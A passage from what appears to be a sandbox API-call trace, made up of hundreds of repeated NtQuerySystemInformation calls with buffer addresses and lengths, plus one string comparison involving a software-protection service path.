SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x20, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x38, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x38, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb50, Length=0x20, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeae0, Length=0x20, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeae0, Length=0x20, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x50, ResultLength=0x0) [0233.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x50, ResultLength=0x0) [0233.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd20, Length=0x50, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x50, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x50, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x50, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x50, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb40, Length=0x38, ResultLength=0x0) [0233.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd970, Length=0x28, ResultLength=0x0) [0233.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd970, Length=0x28, ResultLength=0x0) [0233.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd970, Length=0x28, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd970, Length=0x28, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9e0, Length=0x28, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb40, Length=0x38, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x28, ResultLength=0x0) [0233.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x28, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd900, Length=0x20, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd880, Length=0x20, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd880, Length=0x20, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd880, Length=0x20, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb40, Length=0x38, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb40, Length=0x38, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd9c0, Length=0x20, ResultLength=0x0) [0233.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd950, Length=0x20, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf70, Length=0x50, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf70, Length=0x50, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf70, Length=0x50, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x28, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x28, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x28, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x28, ResultLength=0x0) [0233.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x28, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x28, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x20, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x20, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x20, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x20, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x20, ResultLength=0x0) [0233.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdba0, Length=0x20, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdba0, Length=0x20, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf70, Length=0x50, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf70, Length=0x50, ResultLength=0x0) [0233.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf70, Length=0x50, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde60, Length=0x50, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x28, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x28, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbc0, Length=0x28, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x28, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x28, ResultLength=0x0) [0233.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcb0, Length=0x28, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x20, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x20, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x20, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdb90, Length=0x20, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd90, Length=0x38, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc10, Length=0x20, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdba0, Length=0x20, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdba0, Length=0x20, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfa0, Length=0x28, ResultLength=0x0) [0233.228] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe020, Length=0x50, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf50, Length=0x38, ResultLength=0x0) [0233.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0233.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0233.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd80, Length=0x28, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddf0, Length=0x28, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.233] NtQuerySystemInformation (SystemInformationClass=0xb9, 